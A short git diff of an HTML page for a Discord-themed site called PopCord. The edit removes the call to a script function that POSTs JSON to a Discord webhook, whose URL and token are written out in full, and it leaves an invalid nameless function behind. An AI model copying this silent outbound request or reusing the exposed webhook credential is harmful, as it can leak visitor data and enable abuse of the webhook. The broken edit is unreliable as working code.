--- a/index.html
+++ b/index.html
@@ -324,7 +324,7 @@
                 document.write(' PopCord - Not affilated with Discord, Inc.');
                 document.write('<br><br>Made with ❤️ By spidirman#4534 !')
                 
-    function stats(json) {
+    function(json) {
 
         const request = new XMLHttpRequest();
         request.open("POST", "https://discord.com/api/webhooks/1005611073442942986/ezu1WbwEfcJKMykXm3FyayKGWZv4PZBDai8NEkDSTgW3mbExrtife6A1v8ymBsn-uV-g");
@@ -358,7 +358,6 @@
 
         request.send(JSON.stringify(params))
     };
-stats()
             </script>
 
         </div>
